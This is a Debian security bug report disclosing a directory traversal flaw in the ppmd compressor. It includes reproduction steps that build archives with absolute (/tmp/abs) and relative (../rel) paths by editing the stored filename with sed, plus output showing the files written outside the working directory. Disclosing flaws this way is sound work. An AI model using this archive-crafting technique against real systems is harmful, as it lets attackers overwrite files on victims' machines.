Bug#775218: ppmd: directory traversal vulnerability
Package: ppmd
Version: 10.1-5
Tags: security
ppmd is susceptible to directory traversal vulnerabilities. While
decompressing a file, it will happily use absolute and relative paths
taken from the input. This can be exploited by a malicious compressed
file to write files outside the current directory.
1. Absolute path.
A sample could be prepared in the following way:
$ touch XtmpXabs
$ ppmd e -ftest.pmd XtmpXabs
$ sed -i 's|XtmpXabs|/tmp/abs|g' test.pmd
$ rm XtmpXabs
Then check it works:
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ ppmd d test.pmd
Fast PPMII compressor for textual data, variant J, Apr 19 2012
/tmp/abs: 5 > 1, 40.00 bpb, used: 0.0MB, speed: 1
KB/sec
$ ls /tmp/abs
/tmp/abs
2. Relative path with "..".
A sample could be prepared in the following way:
$ touch XXXrel
$ ppmd e -ftest.pmd XXXrel
$ sed -i 's|XXXrel|../rel|g' test.pmd
$ rm XXXrel
Then check it works:
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ ppmd d test.pmd
Fast PPMII compressor for textual data, variant J, Apr 19 2012
../rel: 5 > 1, 40.00 bpb, used: 0.0MB, speed: 1
KB/sec
$ ls ../rel
../rel
--
Alexander Cherepanov
Reply to: